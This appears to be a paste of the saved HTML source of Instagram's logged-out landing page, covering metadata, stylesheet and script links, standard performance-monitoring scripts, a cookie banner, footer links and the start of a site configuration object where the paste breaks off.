Untitled
3 years ago in Plain Text
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Instagram</title>
<meta name="robots" content="noimageindex, noarchive">
<base href = "https://www.instagram.com" />
<meta name="mobile-web-app-capable" content="yes">
<meta name="theme-color" content="#ffffff">
<meta id="viewport" name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, viewport-fit=cover">
<link rel="manifest" href="/data/manifest.json">
<link rel="preload" href="/static/bundles/metro/ConsumerUICommons.css/08584012be7b.css" as="style" type="text/css" crossorigin="anonymous">
<link rel="preload" href="/static/bundles/metro/Consumer.css/48d5981a0dd7.css" as="style" type="text/css" crossorigin="anonymous">
<link rel="preload" href="/static/bundles/metro/LandingPage.css/8d927d69de86.css" as="style" type="text/css" crossorigin="anonymous">
<link rel="preload" href="/static/bundles/metro/Vendor.js/5a56d51ae30f.js" as="script" type="text/javascript" crossorigin="anonymous">
<link rel="preload" href="/static/bundles/metro/en_US.js/b103edcefcae.js" as="script" type="text/javascript" crossorigin="anonymous">
<link rel="preload" href="/static/bundles/metro/ConsumerLibCommons.js/fe2e044f3afa.js" as="script" type="text/javascript" crossorigin="anonymous">
<link rel="preload" href="/static/bundles/metro/ConsumerUICommons.js/eb2a57c472a9.js" as="script" type="text/javascript" crossorigin="anonymous">
<link rel="preload" href="/static/bundles/metro/ConsumerAsyncCommons.js/1eaeaff3f9d8.js" as="script" type="text/javascript" crossorigin="anonymous">
<link rel="preload" href="/static/bundles/metro/Consumer.js/962f323f0160.js" as="script" type="text/javascript" crossorigin="anonymous">
<link rel="preload" href="/static/bundles/metro/LandingPage.js/365c884f0522.js" as="script" type="text/javascript" crossorigin="anonymous">
<link rel="prefetch" as="script" href="/static/bundles/metro/FeedPageContainer.js/e42ee31067f0.js" type="text/javascript" crossorigin="anonymous">
<link rel="prefetch" as="stylesheet" href="/static/bundles/metro/FeedPageContainer.css/3bf529c154e1.css" type="text/css" crossorigin="anonymous">
<script src="https://connect.facebook.net/en_US/sdk.js?hash=7c1d1f29dc8d17ffd9d42c39fb2d28c4&amp;ua=modern_es6" async="" crossorigin="anonymous"></script><script id="facebook-jssdk" src="https://connect.facebook.net/en_US/sdk.js"></script><script type="text/javascript">
(function() {
var docElement = document.documentElement;
var classRE = new RegExp('(^|\\s)no-js(\\s|$)');
var className = docElement.className;
docElement.className = className.replace(classRE, '$1js$2');
})();
</script>
<script type="text/javascript">
(function() {
if ('PerformanceObserver' in window && 'PerformancePaintTiming' in window) {
window.__bufferedPerformance = [];
var ob = new PerformanceObserver(function(e) {
window.__bufferedPerformance.push.apply(window.__bufferedPerformance,e.getEntries());
});
ob.observe({entryTypes:['paint']});
}
window.__bufferedErrors = [];
window.onerror = function(message, url, line, column, error) {
window.__bufferedErrors.push({
message: message,
url: url,
line: line,
column: column,
error: error
});
return false;
};
window.__initialData = {
pending: true,
waiting: []
};
function asyncFetchSharedData(extra) {
var sharedDataReq = new XMLHttpRequest();
sharedDataReq.onreadystatechange = function() {
if (sharedDataReq.readyState === 4) {
if(sharedDataReq.status === 200){
var sharedData = JSON.parse(sharedDataReq.responseText);
window.__initialDataLoaded(sharedData, extra);
}
}
}
sharedDataReq.open('GET', '/data/shared_data/', true);
sharedDataReq.send(null);
}
function notifyLoaded(item, data) {
item.pending = false;
item.data = data;
for (var i = 0;i < item.waiting.length; ++i) {
item.waiting[i].resolve(item.data);
}
item.waiting = [];
}
function notifyError(item, msg) {
item.pending = false;
item.error = new Error(msg);
for (var i = 0;i < item.waiting.length; ++i) {
item.waiting[i].reject(item.error);
}
item.waiting = [];
}
window.__initialDataLoaded = function(initialData, extraData) {
if (extraData) {
for (var key in extraData) {
initialData[key] = extraData[key];
}
}
notifyLoaded(window.__initialData, initialData);
};
window.__initialDataError = function(msg) {
notifyError(window.__initialData, msg);
};
window.__additionalData = {};
window.__pendingAdditionalData = function(paths) {
for (var i = 0;i < paths.length; ++i) {
window.__additionalData[paths[i]] = {
pending: true,
waiting: []
};
}
};
window.__additionalDataLoaded = function(path, data) {
if (path in window.__additionalData) {
notifyLoaded(window.__additionalData[path], data);
} else {
console.error('Unexpected additional data loaded "' + path + '"');
}
};
window.__additionalDataError = function(path, msg) {
if (path in window.__additionalData) {
notifyError(window.__additionalData[path], msg);
} else {
console.error('Unexpected additional data encountered an error "' + path + '": ' + msg);
}
};
})();
</script><script type="text/javascript">
/*
Copyright 2018 Google Inc. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
(function(){function g(a,c){b||(b=a,f=c,h.forEach(function(a){removeEventListener(a,l,e)}),m())}function m(){b&&f&&0<d.length&&(d.forEach(function(a){a(b,f)}),d=[])}function n(a,c){function k(){g(a,c);d()}function b(){d()}function d(){removeEventListener("pointerup",k,e);removeEventListener("pointercancel",b,e)}addEventListener("pointerup",k,e);addEventListener("pointercancel",b,e)}function l(a){if(a.cancelable){var c=performance.now(),b=a.timeStamp;b>c&&(c=+new Date);c-=b;"pointerdown"==a.type?n(c,
a):g(c,a)}}var e={passive:!0,capture:!0},h=["click","mousedown","keydown","touchstart","pointerdown"],b,f,d=[];h.forEach(function(a){addEventListener(a,l,e)});window.perfMetrics=window.perfMetrics||{};window.perfMetrics.onFirstInputDelay=function(a){d.push(a);m()}})();
</script>
<link rel="apple-touch-icon-precomposed" sizes="76x76" href="/static/images/ico/apple-touch-icon-76x76-precomposed.png/666282be8229.png">
<link rel="apple-touch-icon-precomposed" sizes="120x120" href="/static/images/ico/apple-touch-icon-120x120-precomposed.png/8a5bd3f267b1.png">
<link rel="apple-touch-icon-precomposed" sizes="152x152" href="/static/images/ico/apple-touch-icon-152x152-precomposed.png/68193576ffc5.png">
<link rel="apple-touch-icon-precomposed" sizes="167x167" href="/static/images/ico/apple-touch-icon-167x167-precomposed.png/4985e31c9100.png">
<link rel="apple-touch-icon-precomposed" sizes="180x180" href="/static/images/ico/apple-touch-icon-180x180-precomposed.png/c06fdb2357bd.png">
<link rel="icon" sizes="192x192" href="/static/images/ico/favicon-192.png/68d99ba29cc8.png">
<link rel="mask-icon" href="/static/images/ico/favicon.svg/fc72dd4bfde8.svg" color="#262626">
<link rel="shortcut icon" type="image/x-icon" href="/static/images/ico/favicon.ico/36b3ee2d91ed.ico">
<meta property="al:ios:app_name" content="Instagram">
<meta property="al:ios:app_store_id" content="389801252">
<meta property="al:ios:url" content="instagram://mainfeed">
<meta property="al:android:app_name" content="Instagram">
<meta property="al:android:package" content="com.instagram.android">
<meta property="al:android:url" content="https://www.instagram.com/_n/mainfeed/">
<meta property="og:site_name" content="Instagram">
<meta property="og:title" content="Instagram">
<meta property="og:image" content="/static/images/ico/favicon-200.png/ab6eff595bb1.png">
<meta property="fb:app_id" content="124024574287414">
<meta property="og:url" content="https://instagram.com/">
<meta content="Create an account or log in to Instagram - A simple, fun &amp; creative way to capture, edit &amp; share photos, videos &amp; messages with friends &amp; family." name="description">
<link rel="canonical" href="https://www.instagram.com/">
<link rel="alternate" href="https://www.instagram.com/" hreflang="x-default">
<link rel="alternate" href="https://www.instagram.com/?hl=en" hreflang="en">
<link rel="alternate" href="https://www.instagram.com/?hl=fr" hreflang="fr">
<link rel="alternate" href="https://www.instagram.com/?hl=it" hreflang="it">
<link rel="alternate" href="https://www.instagram.com/?hl=de" hreflang="de">
<link rel="alternate" href="https://www.instagram.com/?hl=es" hreflang="es">
<link rel="alternate" href="https://www.instagram.com/?hl=zh-cn" hreflang="zh-cn">
<link rel="alternate" href="https://www.instagram.com/?hl=zh-tw" hreflang="zh-tw">
<link rel="alternate" href="https://www.instagram.com/?hl=ja" hreflang="ja">
<link rel="alternate" href="https://www.instagram.com/?hl=ko" hreflang="ko">
<link rel="alternate" href="https://www.instagram.com/?hl=pt" hreflang="pt">
<link rel="alternate" href="https://www.instagram.com/?hl=pt-br" hreflang="pt-br">
<link rel="alternate" href="https://www.instagram.com/?hl=af" hreflang="af">
<link rel="alternate" href="https://www.instagram.com/?hl=cs" hreflang="cs">
<link rel="alternate" href="https://www.instagram.com/?hl=da" hreflang="da">
<link rel="alternate" href="https://www.instagram.com/?hl=el" hreflang="el">
<link rel="alternate" href="https://www.instagram.com/?hl=fi" hreflang="fi">
<link rel="alternate" href="https://www.instagram.com/?hl=hr" hreflang="hr">
<link rel="alternate" href="https://www.instagram.com/?hl=hu" hreflang="hu">
<link rel="alternate" href="https://www.instagram.com/?hl=id" hreflang="id">
<link rel="alternate" href="https://www.instagram.com/?hl=ms" hreflang="ms">
<link rel="alternate" href="https://www.instagram.com/?hl=nb" hreflang="nb">
<link rel="alternate" href="https://www.instagram.com/?hl=nl" hreflang="nl">
<link rel="alternate" href="https://www.instagram.com/?hl=pl" hreflang="pl">
<link rel="alternate" href="https://www.instagram.com/?hl=ru" hreflang="ru">
<link rel="alternate" href="https://www.instagram.com/?hl=sk" hreflang="sk">
<link rel="alternate" href="https://www.instagram.com/?hl=sv" hreflang="sv">
<link rel="alternate" href="https://www.instagram.com/?hl=th" hreflang="th">
<link rel="alternate" href="https://www.instagram.com/?hl=tl" hreflang="tl">
<link rel="alternate" href="https://www.instagram.com/?hl=tr" hreflang="tr">
<link rel="alternate" href="https://www.instagram.com/?hl=hi" hreflang="hi">
<link rel="alternate" href="https://www.instagram.com/?hl=bn" hreflang="bn">
<link rel="alternate" href="https://www.instagram.com/?hl=gu" hreflang="gu">
<link rel="alternate" href="https://www.instagram.com/?hl=kn" hreflang="kn">
<link rel="alternate" href="https://www.instagram.com/?hl=ml" hreflang="ml">
<link rel="alternate" href="https://www.instagram.com/?hl=mr" hreflang="mr">
<link rel="alternate" href="https://www.instagram.com/?hl=pa" hreflang="pa">
<link rel="alternate" href="https://www.instagram.com/?hl=ta" hreflang="ta">
<link rel="alternate" href="https://www.instagram.com/?hl=te" hreflang="te">
<link rel="alternate" href="https://www.instagram.com/?hl=ne" hreflang="ne">
<link rel="alternate" href="https://www.instagram.com/?hl=si" hreflang="si">
<link rel="alternate" href="https://www.instagram.com/?hl=ur" hreflang="ur">
<link rel="alternate" href="https://www.instagram.com/?hl=vi" hreflang="vi">
<link rel="alternate" href="https://www.instagram.com/?hl=bg" hreflang="bg">
<link rel="alternate" href="https://www.instagram.com/?hl=fr-ca" hreflang="fr-ca">
<link rel="alternate" href="https://www.instagram.com/?hl=ro" hreflang="ro">
<link rel="alternate" href="https://www.instagram.com/?hl=sr" hreflang="sr">
<link rel="alternate" href="https://www.instagram.com/?hl=uk" hreflang="uk">
<link rel="alternate" href="https://www.instagram.com/?hl=zh-hk" hreflang="zh-hk">
<link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-pa">
<link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-ec">
<link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-cr">
<link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-cu">
<link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-co">
<link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-bo">
<link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-do">
<link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-cl">
<link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-hn">
<link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-mx">
<link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-sv">
<link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-ar">
<link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-py">
<link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-uy">
<link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-gt">
<link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-ve">
<link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-pr">
<link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-ni">
<link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-pe">
<script type="text/javascript" as="script" crossorigin="anonymous" charset="utf-8" async="" src="/static/bundles/metro/LandingPage.js/365c884f0522.js"></script><link href="/static/bundles/metro/LandingPage.css/8d927d69de86.css" type="text/css" crossorigin="anonymous" rel="stylesheet"><style type="text/css">.fb_hidden{position:absolute;top:-10000px;z-index:10001}.fb_reposition{overflow:hidden;position:relative}.fb_invisible{display:none}.fb_reset{background:none;border:0;border-spacing:0;color:#000;cursor:auto;direction:ltr;font-family:"lucida grande", tahoma, verdana, arial, sans-serif;font-size:11px;font-style:normal;font-variant:normal;font-weight:normal;letter-spacing:normal;line-height:1;margin:0;overflow:visible;padding:0;text-align:left;text-decoration:none;text-indent:0;text-shadow:none;text-transform:none;visibility:visible;white-space:normal;word-spacing:normal}.fb_reset>div{overflow:hidden}@keyframes fb_transform{from{opacity:0;transform:scale(.95)}to{opacity:1;transform:scale(1)}}.fb_animate{animation:fb_transform .3s forwards}
.fb_dialog{background:rgba(82, 82, 82, .7);position:absolute;top:-10000px;z-index:10001}.fb_dialog_advanced{border-radius:8px;padding:10px}.fb_dialog_content{background:#fff;color:#373737}.fb_dialog_close_icon{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 0 transparent;cursor:pointer;display:block;height:15px;position:absolute;right:18px;top:17px;width:15px}.fb_dialog_mobile .fb_dialog_close_icon{left:5px;right:auto;top:5px}.fb_dialog_padding{background-color:transparent;position:absolute;width:1px;z-index:-1}.fb_dialog_close_icon:hover{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 -15px transparent}.fb_dialog_close_icon:active{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 -30px transparent}.fb_dialog_iframe{line-height:0}.fb_dialog_content .dialog_title{background:#6d84b4;border:1px solid #365899;color:#fff;font-size:14px;font-weight:bold;margin:0}.fb_dialog_content .dialog_title>span{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/yd/r/Cou7n-nqK52.gif) no-repeat 5px 50%;float:left;padding:5px 0 7px 26px}body.fb_hidden{height:100%;left:0;margin:0;overflow:visible;position:absolute;top:-10000px;transform:none;width:100%}.fb_dialog.fb_dialog_mobile.loading{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/ya/r/3rhSv5V8j3o.gif) white no-repeat 50% 50%;min-height:100%;min-width:100%;overflow:hidden;position:absolute;top:0;z-index:10001}.fb_dialog.fb_dialog_mobile.loading.centered{background:none;height:auto;min-height:initial;min-width:initial;width:auto}.fb_dialog.fb_dialog_mobile.loading.centered #fb_dialog_loader_spinner{width:100%}.fb_dialog.fb_dialog_mobile.loading.centered .fb_dialog_content{background:none}.loading.centered #fb_dialog_loader_close{clear:both;color:#fff;display:block;font-size:18px;padding-top:20px}#fb-root #fb_dialog_ipad_overlay{background:rgba(0, 0, 0, .4);bottom:0;left:0;min-height:100%;position:absolute;right:0;top:0;width:100%;z-index:10000}#fb-root #fb_dialog_ipad_overlay.hidden{display:none}.fb_dialog.fb_dialog_mobile.loading iframe{visibility:hidden}.fb_dialog_mobile .fb_dialog_iframe{position:sticky;top:0}.fb_dialog_content .dialog_header{background:linear-gradient(from(#738aba), to(#2c4987));border-bottom:1px solid;border-color:#043b87;box-shadow:white 0 1px 1px -1px inset;color:#fff;font:bold 14px Helvetica, sans-serif;text-overflow:ellipsis;text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0;vertical-align:middle;white-space:nowrap}.fb_dialog_content .dialog_header table{height:43px;width:100%}.fb_dialog_content .dialog_header td.header_left{font-size:12px;padding-left:5px;vertical-align:middle;width:60px}.fb_dialog_content .dialog_header td.header_right{font-size:12px;padding-right:5px;vertical-align:middle;width:60px}.fb_dialog_content .touchable_button{background:linear-gradient(from(#4267B2), to(#2a4887));background-clip:padding-box;border:1px solid #29487d;border-radius:3px;display:inline-block;line-height:18px;margin-top:3px;max-width:85px;padding:4px 12px;position:relative}.fb_dialog_content .dialog_header .touchable_button input{background:none;border:none;color:#fff;font:bold 12px Helvetica, sans-serif;margin:2px -12px;padding:2px 6px 3px 6px;text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0}.fb_dialog_content .dialog_header .header_center{color:#fff;font-size:16px;font-weight:bold;line-height:18px;text-align:center;vertical-align:middle}.fb_dialog_content .dialog_content{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/y9/r/jKEcVPZFk-2.gif) no-repeat 50% 50%;border:1px solid #4a4a4a;border-bottom:0;border-top:0;height:150px}.fb_dialog_content .dialog_footer{background:#f5f6f7;border:1px solid #4a4a4a;border-top-color:#ccc;height:40px}#fb_dialog_loader_close{float:left}.fb_dialog.fb_dialog_mobile .fb_dialog_close_button{text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0}.fb_dialog.fb_dialog_mobile .fb_dialog_close_icon{visibility:hidden}#fb_dialog_loader_spinner{animation:rotateSpinner 1.2s linear infinite;background-color:transparent;background-image:url(https://static.xx.fbcdn.net/rsrc.php/v3/yD/r/t-wz8gw1xG1.png);background-position:50% 50%;background-repeat:no-repeat;height:24px;width:24px}@keyframes rotateSpinner{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}
.fb_iframe_widget{display:inline-block;position:relative}.fb_iframe_widget span{display:inline-block;position:relative;text-align:justify}.fb_iframe_widget iframe{position:absolute}.fb_iframe_widget_fluid_desktop,.fb_iframe_widget_fluid_desktop span,.fb_iframe_widget_fluid_desktop iframe{max-width:100%}.fb_iframe_widget_fluid_desktop iframe{min-width:220px;position:relative}.fb_iframe_widget_lift{z-index:1}.fb_iframe_widget_fluid{display:inline}.fb_iframe_widget_fluid span{width:100%}</style></head>
<body class="" style="">
<div id="react-root"><section class="_9eogI E3X2T"><div class="lOPC8 "><p class="HLoYX">To help personalize content, tailor and measure ads, and provide a safer experience, we use cookies. By clicking or navigating the site, you agree to allow our collection of information on and off Instagram through cookies. Learn more, including about available controls: <a class="sSX8t" href="/legal/cookies/">Cookies Policy</a>.</p><button class="KPZNL coreSpriteDismissLarge"><span class="Szr5J">Close</span></button></div><div></div><main class="SCxLW o64aR " role="main"><article class="_4_yKc"><div class="yOZjD _80tAB"><div class="V64Sp"><img class="RP4i1 JtrJi " src="/static/images/homepage/screenshot1.jpg/d6bf0c928b5a.jpg" alt=""><img class="RP4i1 " src="/static/images/homepage/screenshot2.jpg/6f03eb85463c.jpg" alt=""><img class="RP4i1 " src="/static/images/homepage/screenshot3.jpg/f0c687aa6ec2.jpg" alt=""><img class="RP4i1 " src="/static/images/homepage/screenshot4.jpg/842fe5699220.jpg" alt=""><img class="RP4i1 " src="/static/images/homepage/screenshot5.jpg/0a2d3016f375.jpg" alt=""></div></div><div class="rgFsT "><div class="gr27e "><h1 class="NXVPg Szr5J coreSpriteLoggedOutWordmark">Instagram</h1><div class=" Igw0E rBNOH YBx95 _4EzTm " style="min-height: 160px;"><div class=" Igw0E IwRSH YBx95 _4EzTm " style="height: 18px; width: 18px;"><svg aria-label="Loading..." class=" FSiF6 " viewBox="0 0 100 100"><rect fill="#555555" height="10" opacity="0" rx="5" ry="5" transform="rotate(-90 50 50)" width="28" x="67" y="45"></rect><rect fill="#555555" height="10" opacity="0.125" rx="5" ry="5" transform="rotate(-45 50 50)" width="28" x="67" y="45"></rect><rect fill="#555555" height="10" opacity="0.25" rx="5" ry="5" transform="rotate(0 50 50)" width="28" x="67" y="45"></rect><rect fill="#555555" height="10" opacity="0.375" rx="5" ry="5" transform="rotate(45 50 50)" width="28" x="67" y="45"></rect><rect fill="#555555" height="10" opacity="0.5" rx="5" ry="5" transform="rotate(90 50 50)" width="28" x="67" y="45"></rect><rect fill="#555555" height="10" opacity="0.625" rx="5" ry="5" transform="rotate(135 50 50)" width="28" x="67" y="45"></rect><rect fill="#555555" height="10" opacity="0.75" rx="5" ry="5" transform="rotate(180 50 50)" width="28" x="67" y="45"></rect><rect fill="#555555" height="10" opacity="0.875" rx="5" ry="5" transform="rotate(225 50 50)" width="28" x="67" y="45"></rect></svg></div></div></div></div></article></main><footer class="_8Rna9 _3Laht " role="contentinfo"><div class="iseBh VWk7Y " style="max-width: 1012px;"><nav class="uxKLF"><ul class="ixdEe _9Rlzb"><li class="K5OFK"><a class="l93RR" href="https://about.instagram.com/" rel="nofollow noopener noreferrer" target="_blank">About</a></li><li class="K5OFK"><a class="l93RR" href="https://help.instagram.com/">Help</a></li><li class="K5OFK"><a class="l93RR" href="https://about.instagram.com/blog/">Press</a></li><li class="K5OFK"><a class="l93RR" href="/developer/">API</a></li><li class="K5OFK"><a class="l93RR" href="/about/jobs/">Jobs</a></li><li class="K5OFK"><a class="l93RR" href="/legal/privacy/">Privacy</a></li><li class="K5OFK"><a class="l93RR _vfM2" href="/legal/terms/">Terms</a></li><li class="K5OFK"><a class="l93RR" href="/explore/locations/">Locations</a></li><li class="K5OFK"><a class="l93RR" href="/directory/profiles/">Top Accounts</a></li><li class="K5OFK"><a class="l93RR" href="/directory/hashtags/">Hashtags</a></li><li class="K5OFK"><span class="_3G4x7 l93RR">Language<select aria-label="Switch Display Language" class="hztqj"><option value="af">Afrikaans</option><option value="cs">Čeština</option><option value="da">Dansk</option><option value="de">Deutsch</option><option value="el">Ελληνικά</option><option value="en">English</option><option value="es">Español (España)</option><option value="es-la">Español</option><option value="fi">Suomi</option><option value="fr">Français</option><option value="id">Bahasa Indonesia</option><option value="it">Italiano</option><option value="ja">日本語</option><option value="ko">한국어</option><option value="ms">Bahasa Melayu</option><option value="nb">Norsk</option><option value="nl">Nederlands</option><option value="pl">Polski</option><option value="pt-br">Português (Brasil)</option><option value="pt">Português (Portugal)</option><option value="ru">Русский</option><option value="sv">Svenska</option><option value="th">ภาษาไทย</option><option value="tl">Filipino</option><option value="tr">Türkçe</option><option value="zh-cn">中文(简体)</option><option value="zh-tw">中文(台灣)</option><option value="bn">বাংলা</option><option value="gu">ગુજરાતી</option><option value="hi">हिन्दी</option><option value="hr">Hrvatski</option><option value="hu">Magyar</option><option value="kn">ಕನ್ನಡ</option><option value="ml">മലയാളം</option><option value="mr">मराठी</option><option value="ne">नेपाली</option><option value="pa">ਪੰਜਾਬੀ</option><option value="si">සිංහල</option><option value="sk">Slovenčina</option><option value="ta">தமிழ்</option><option value="te">తెలుగు</option><option value="vi">Tiếng Việt</option><option value="zh-hk">中文(香港)</option><option value="bg">Български</option><option value="fr-ca">Français (Canada)</option><option value="ro">Română</option><option value="sr">Српски</option><option value="uk">Українська</option></select></span></li></ul></nav><span class="DINPA">© 2020 Instagram from Facebook</span></div></footer></section></div>
<link rel="stylesheet" href="/static/bundles/metro/ConsumerUICommons.css/08584012be7b.css" type="text/css" crossorigin="anonymous">
<link rel="stylesheet" href="/static/bundles/metro/Consumer.css/48d5981a0dd7.css" type="text/css" crossorigin="anonymous">
<script type="text/javascript">window._sharedData = {"config":{"csrf_token":"7huBsFWmeh7JUdKH6UzCSOF7Y0oy2512","viewer":null,"viewerId":null},"country_code":"PT","language_code":"en","locale":"en_US","entry_data":{"LandingPage":[{"captcha":{"enabled":false,"key":""},"hsite_redirect_url":"","prefill_phone_number":"","gdpr_required":true,"tos_version":"eu","sideload_url":null}]},"hostname":"www.instagram.com","is_whitelisted_crawl_bot":false,"deployment_stage":"c2","platform":"windows_nt_10","nonce":"YZjDy6k2IWoa+vmt3HStxw==","mid_pct":73.99672,"zero_data":{},"cache_schema_version":3,"server_checks":{},"knobx":{"17":false,"20":true,"22":true,"23":true,"24":true,"25":true,"26":true,"27":true,"28":true,"29":true,"30":true,"31":true,"32":true,"33":true,"34":true,"4":false},"to_cache":{"gatekeepers":{"10":false,"100":false,"101":true,"102":true,"103":true,"104":true,"105":true,"106":true,"107":false,"108":true,"11":false,"112":true,"113":true,"114":true,"116":true,"117":true,"119":false,"12":false,"120":true,"123":false,"126":false,"128":false,"13":true,"131":false,"132":false,"137":false,"14":true,"140":false,"142":false,"143":false,"144":false,"145":false,"146":true,"147":false,"149":false,"15":true,"150":false,"151":true,"152":false,"153":false,"154":false,"156":false,"16":false,"18":true,"19":false,"23":false,"24":false,"26":true,"27":false,"28":false,"29":true,"31":false,"32":true,"34":false,"35":false,"38":true,"4":true,"40":true,"41":false,"43":true,"5":false,"59":true,"6":false,"61":false,"62":false,"63":false,"64":false,"65":false,"67":true,"68":false,"69":true,"7":false,"71":false,"73":false,"74":false,"75":true,"77":true,"78":true,"79":false,"8":false,"81":false,"82":true,"84":false,"86":false,"88":true,"9":false,"91":false,"95":true,"97":false,"99":false},"qe":{"app_upsell":{"g":"","p":{}},"igl_app_upsell":{"g":"","p":{}},"notif":{"g":"","p":{}},"onetaplogin":{"g":"","p":{}},"felix_clear_fb_cookie":{"g":"","p":{}},"felix_creation_duration_limits":{"g":"","p":{}},"felix_creation_fb_crossposting":{"g":"","p":{}},"felix_creation_fb_crossposting_v2":{"g":"","p":{}},"felix_creation_validation":{"g":"","p":{}},"post_options":{"g":"","p":{}},"sticker_tray":{"g":"","p":{}},"web_sentry":{"g":"","p":{}},"0":{"p":{"9":false},"l":{},"qex":true},"100":{"p":{"0":true},"l":{},"qex":true},"101":{"p":{"0":false,"1":false},"l":{},"qex":true},"102":{"p":{"0":true},"l":{},"qex":true},"103":{"p":{"1":false},"l":{},"qex":true},"104":{"p":{"0":true},"l":{},"qex":true},"108":{"p":{"0":false,"1":false},"l":{},"qex":true},"109":{"p":{},"l":{},"qex":true},"111":{"p":{"0":false,"1":false},"l":{},"qex":true},"113":{"p":{"0":true,"1":false,"2":true,"4":false,"5":false,"7":false,"8":false},"l":{},"qex":true},"116":{"p":{"1":true,"2":1},"l":{"1":true},"qex":true},"117":{"p":{"0":true},"l":{},"qex":true},"118":{"p":{"0":false,"1":true,"2":false},"l":{},"qex":true},"119":{"p":{"0":false},"l":{},"qex":true},"12":{"p":{"0":5},"l":{},"qex":true},"120":{"p":{"0":false},"l":{},"qex":true},"121":{"p":{"0":false},"l":{},"qex":true},"122":{"p":{"0":false},"l":{},"qex":true},"123":{"p":{"0":false,"1":false},"l":{"0":true,"1":true},"qex":true},"124":{"p":{"0":false,"1":true,"2":false},"l":{},"qex":true},"125":{"p":{"0":true},"l":{},"qex":true},"126":{"p":{"0":true},"l":{},"qex":true},"127":{"p":{"0":true,"1":false,"2":true},"l":{},"qex":true},"128":{"p":{"0":false,"1":false},"l":{},"qex":true},"129":{"p":{"1":false,"2":true},"l":{"2":true},"qex":true},"13":{"p":{"0":true},"l":{},"qex":true},"131":{"p":{"2":false,"3":false,"4":false},"l":{},"qex":true},"132":{"p":{"0":false},"l":{},"qex":true},"135":{"p":{"0":false,"1":false,"2":false,"3":false},"l":{},"qex":true},"137":{"p":{},"l":{},"qex":true},"138":{"p":{},"l":{},"qex":true},"139":{"p":{},"l":{},"qex":true},"140":{"p":{},"l":{},"qex":true},"142":{"p":{"0":false},"l":{},"qex":true},"143":{"p":{"1":false},"l":{},"qex":true},"16":{"p":{"0":false},"l":{},"qex":true},"21":{"p":{"2":false},"l":{},"qex":true},"22":{"p":{"1":false,"10":0.0,"11":15,"12":3,"13":false,"2":8.0,"3":0.85,"4":0.95},"l":{},"qex":true},"23":{"p":{"0":false,"1":false},"l":{},"qex":true},"25":{"p":{},"l":{},"qex":true},"26":{"p":{"0":""},"l":{},"qex":true},"28":{"p":{"0":false},"l":{},"qex":true},"29":{"p":{},"l":{},"qex":true},"31":{"p":{},"l":{},"qex":true},"33":{"p":{},"l":{},"qex":true},"34":{"p":{"0":false},"l":{},"qex":true},"36":{"p":{"0":true,"1":true,"2":false,"3":false,"4":false},"l":{},"qex":true},"37":{"p":{"0":false},"l":{},"qex":true},"39":{"p":{"0":false,"14":false,"8":false},"l":{},"qex":true},"41":{"p":{"3":true},"l":{},"qex":true},"42":{"p":{"0":true},"l":{},"qex":true},"43":{"p":{"0":false,"1":false,"2":false},"l":{},"qex":true},"44":{"p":{"1":"inside_media","2":0.2},"l":{},"qex":true},"45":{"p":{"13":false,"17":0,"26":"control","32":false,"33":false,"35":false,"36":"control","37":false,"38":true,"40":"control"},"l":{},"qex":true},"46":{"p":{"0":false},"l":{},"qex":true},"47":{"p":{"0":true,"1":true,"10":false,"11":false,"2":false,"3":false,"9":false},"l":{},"qex":true},"49":{"p":{"0":false},"l":{},"qex":true},"50":{"p":{"0":false},"l":{},"qex":true},"54":{"p":{"0":false},"l":{},"qex":true},"55":{"p":{"0":false},"l":{},"qex":true},"58":{"p":{"0":0.25,"1":true},"l":{},"qex":true},"59":{"p":{"0":true},"l":{},"qex":true},"62":{"p":{"0":false},"l":{},"qex":true},"65":{"p":{},"l":{},"qex":true},"67":{"p":{"0":true,"1":true,"2":true,"3":true,"4":false,"5":true,"7":false},"l":{"4":true,"5":true},"qex":true},"69":{"p":{"0":true},"l":{},"qex":true},"71":{"p":{"1":"^/explore/.*|^/accounts/activity/$"},"l":{},"qex":true},"72":{"p":{"1":false,"2":false},"l":{"1":true,"2":true},"qex":true},"73":{"p":{"0":false},"l":{},"qex":true},"74":{"p":{"1":true,"12":false,"13":false,"14":false,"15":false,"2":false,"3":true,"4":false,"7":false,"9":true},"l":{"14":true},"qex":true},"75":{"p":{"0":true},"l":{},"qex":true},"77":{"p":{"1":false},"l":{},